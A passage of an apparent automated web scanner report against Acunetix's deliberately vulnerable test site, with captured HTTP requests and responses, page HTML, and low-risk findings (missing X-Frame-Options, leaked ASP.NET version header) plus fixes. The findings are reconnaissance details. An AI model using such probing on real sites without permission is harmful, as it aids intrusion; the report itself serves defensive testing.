21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 
03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Content-Length: 6567
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (6567 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 22784
Response body (22784 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Content-Length: 10985
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10985 bytes)
AgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%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%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAg
ICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL
7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30486
Response body (30486 bytes)
Parameter
X-Frame-Options
Solution
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Content-Length: 3761
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (3761 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 17924
Response body (17924 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/Signup.aspx
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (399 bytes)
POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Signup.aspx
Content-Length: 1098
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1098 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 13177
Response body (13177 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
Risk=Low, Confidence=High (29)
http://testaspnet.vulnweb.com (29)
X-AspNet-Version Response Header (29)
GET http://testaspnet.vulnweb.com
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:16 GMT
Content-Length: 13912
Response body (13912 bytes)
href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:15 GMT
Content-Length: 13912
Response body (13912 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 14467
Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability 
Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. 
Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. 
</P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td 
align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a 
